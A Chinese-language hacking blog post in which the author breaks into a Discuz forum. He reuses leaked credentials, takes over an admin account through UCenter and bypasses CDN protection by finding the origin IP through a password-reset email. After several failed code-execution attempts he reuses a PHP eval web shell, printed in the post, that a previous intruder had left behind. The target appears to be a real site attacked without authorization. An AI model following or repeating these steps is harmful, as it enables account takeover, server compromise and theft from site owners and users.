通过裤子,得到一账号密码,抱着试试的心态,打开登陆框登陆。
 
尼玛成功登陆了。。那个兴奋!看了一下,是管理。那还等什么?后台拿shell吧。
 
后台一登陆,蛋疼了。密码不对?再试试。还是不对。瞬间无爱了。前台跟后台设不同密码?
 
试了几遍无果,想了想discuz不是还有个UCenter吗?不管三七二十一,试试。
 
人品啊。。竟然可以登陆!瞬间有精神。都进了UCenter还怕进不了后台吗?找了另一个管理账号,密码改之。。。然后。。后台进了。
 
版本是20140301的,淫荡了笑了一下,任意代码执行啊。
站点信息-网站url写入执行代码,尼玛,真正的蛋碎开始了。。
 
竟然有云加速。让我想想,百度云加速 加速乐 360安全卫士 只要找到网站真实ip他们就萎了。那么、、、找ip吧!常用技巧,网站注册一个账号并写上自己邮箱,完了找回密码,服务器会发送邮件到我们邮箱,ip搞到!
 
修改本地hots绕过。站点信息-网站ulr 填写执行生成木马语句。
 
添加专题什么的过程就略过吧,不懂的可以百度一下。提示已经写入并生成专题。
 
那么问题又来了,看看我们刚刚生成的马。纳尼!!!404?马呢?难道没有执行语句?马被杀了?各种猜想。
 
1分钟的沉思,会不会是什么杀软拦截了我的语句?或者是杀了我的马?写个phpinfo试试。蛋碎了。也不行!经过几次测试,发现只有添加portal_topic_test专题能生成成功,其他专题生成失败,为什么?我丢你螺母,专题目录被禁止写入了。测试几遍,觉定还是放弃专题getshell,寻找其他突破口
 
想了想,既然专题不行,那就添加应用试试。接着,蛋又碎一地!目录无法写入。
 
我丢你螺母。。非逼我出绝招。key getshell!!!
 
有了key 好办了。直接上工具!德玛西亚万岁!
 
我QNMGB!key getshell也不成功。到此已经没有蛋可以碎了。就这么放弃了吗?不!我不是那么轻易放弃的人。为了不破坏目标站,本地搭建了一个同版本的discuz程序做测试(本人菜逼,不懂代码审计,就乱xx),本地测试专题getshell,成功了。到template\default\portal目录去看看我们刚刚生成的专题文件。
 
打开看到我们刚刚写的语句。
 
顿时一淫荡的想法一闪而过。
回顾之前生成专题时候,发现能生成portal_topic_test,其他的却不能生成,这文件应该不是管理员创建生成的吧?这尼玛肯定是哪位大神的脚印啊。立马查看大神生成的文件
 
查看源码
 
丢你螺母。。真的有啊!解码得<?php @eval($_POST[c]);?>,难道他会执行了这个?试试!!
 
哈哈哈哈哈,执行了大神之前保留的语句。操刀上之。。。